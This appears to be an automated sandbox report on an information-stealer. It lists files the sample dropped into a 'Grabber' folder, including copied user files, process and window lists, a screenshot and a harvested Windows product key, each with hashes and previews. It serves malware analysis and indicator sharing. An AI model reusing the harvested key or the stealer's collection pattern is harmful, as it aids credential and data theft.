Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XQACHMZIHU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XQACHMZIHU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	23133
Entropy (8bit):	5.677644471748869
Encrypted:	false
SSDEEP:	192:PFT6TToDP2DWiR6R2BtY1O1g44kc6XwbaJhB+gyqUbEg/CfLf/pKIru15PWic9y9:tTlpgKbEGCTCrr9
MD5:	F43BEBE37719231AFA4443D6ECCA0E37
SHA1:	197C707C1A9AB0ADB7D09310D2A5ECD2F50E03BD
SHA-256:	5B3C7937D191AA0B5E691CA885A0840E5E2D1E05277AB189C10EBD7C4A427D01
SHA-512:	0E8C0F185EDE43F5A8500DD850DF7D7F9B02A85CF3C43A4B472447608D894C87C914329E5F0041DE5CC971A3E5C30CCDB9635F3D483E31ACCEC712811C0BFAAB
Malicious:	false
Preview:	NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..PID: 2148..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: chrome..PID: 3784..EXE: C:\Program Files\Google\Chrome\Application\chrome.exe..NAME: RuntimeBroker..PID: 4732..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: csrss..PID: 420..EXE: ..NAME: chrome..PID: 2140..EXE: C:\Program Files\Google\Chrome\Application\chrome.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..PID: 1708..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: svchost..PID: 5152..EXE: C:\Windows\system32\svchost.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..PID: 3208..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..PID: 4288..EXE: C:\Program Files (x86)\ge

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.16832582271378
Encrypted:	false
SSDEEP:	3:j9v4T2rzmnn:Bv4Gmn
MD5:	00EBC6ADAFD76071E4E4D5F79B67A91C
SHA1:	F99D9201FC13F7B26E164264580AF9D905AF1FA9
SHA-256:	53EB52FB87C00AB01B1A529C2CBC729DB6180E208D17323975AC2107728AEA66
SHA-512:	C7EB2BE88BDC74F60D3604D5E695D48FA28B591067E994152FBAFB89E2D93F466E338971BF52F0250CE8A62F9295D6C49256B49E19FD5B906224937532FB389A
Malicious:	false
Preview:	97XJ4-NWY9G-RQKGF-JYTPP-T8VCB

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	18577
Entropy (8bit):	5.637569406112765
Encrypted:	false
SSDEEP:	192:dNkzJjvWi2CTaGW6N9Vuu4YU3ZQU6pb3VKp0wnqZLO0av2C8qSLAkz2Yg9Gn6cIv:uy
MD5:	09DF47F5A32974CB7EE164E8D4210DE4
SHA1:	FD40A22F00411C242C8575EE61AF0ABB9848FF15
SHA-256:	3F45F007D6F071E187335E9D5AB1DC5C22239E3D6101966BE9B543D96E996CF0
SHA-512:	C5C864AE990BE5EC110E97ADDFB60467D4B0971E8AA1F6546CBF0039D26DE9382A59D1E59A25679533406C71510AA1D14DDECE6C3D8C207001CF68E4D53AFE17
Malicious:	false
Preview:	NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..TITLE: New Tab - Google Chrome..PID: 2148..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..TITLE: New Tab - Google Chrome..PID: 1708..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..TITLE: New Tab - Google Chrome..PID: 3208..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..TITLE: New Tab - Google Chrome..PID: 4288..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwfGXIOMcNJXRZGXmgHOgz.exe..NAME: DvMXwDNwfGXIOMcNJXRZGXmgHOgz..TITLE: New Tab - Google Chrome..PID: 3852..EXE: C:\Program Files (x86)\gejpiiguLJnltCFcypfspexkzNsptJuBrQXdENsyZFAkCZrkIlIhDNTAPaDgOTW\DvMXwDNwf

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	86220
Entropy (8bit):	7.851646283535622
Encrypted:	false
SSDEEP:	1536:CX0y9obL/P1XLcalnhDyrbH6kw2p2REcJn5LHUe4iY2XPq/uA/UG+:00y9o/dXLxhGbH/VpeR1KB2XPq2A/b+
MD5:	AA8F178C16E6127A2965DAA00356EE74
SHA1:	0B5FC4716ECA7EA65E1A592FA7F8CAB7F2084164
SHA-256:	4E6C6508D8A2DC26720F74241C78C4F7CC5448076BC388404490044B31A26305
SHA-512:	DEA6EC5BA89BEB418343BBDB079C9B521590AEA1483CD5BC81A8745C5FEFCC3FDB36378CCC1626E07C944666B1FD685EA4DB09675DBB21B79C07A748D2E2F667
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 10:37:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9754078888372564
Encrypted:	false
SSDEEP:	48:8/WdjTLfOHAidAKZdA19ehwiZUklqehAy+3:8uX1Py
MD5:	F28B51D6FE17C23E71A684F486CF71B1
SHA1:	506375B6F1D7A608F28362F66ADC499533F61980
SHA-256:	DE850FC72CA4C1E58F8EA44520FFFC1170824B6059E87938A8A8AF9697F0DF28
SHA-512:	E9FACC5B7DDFE1DF64C229212DAA2BBFF26B5033052EDDA5DF71A8BD6037DAC45FF9197DC5DB1AE5CD54404C84AE6184F962687E7D65E8455F8F2CAEC99702D3
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....F...W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.\....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.\....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.\....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.\..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.\...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........)..}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 10:37:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.993570169484194
Encrypted:	false
SSDEEP:	48:8WdjTLfOHAidAKZdA1weh/iZUkAQkqeh/y+2:8WXv9Qiy
MD5:	D8DAB80F290AC6E7BA408BD0E2A2D180
SHA1:	57F87854EA5C8789574416AC42945654C22D4B36
SHA-256:	55CD6483CFCDC2061C8956AEA8CA49EBFF9EFE31A3E929FB248A1A7080E6BCED
SHA-512:	9C705AE640636BFC71BD36ED285BFA427B233B05B69F9C5E3945494DCD6DAE4DB63F1212BE82D3918285F265E6D7BF93A0F0124978C8A7B293A7C98A272C166B
Malicious:	false
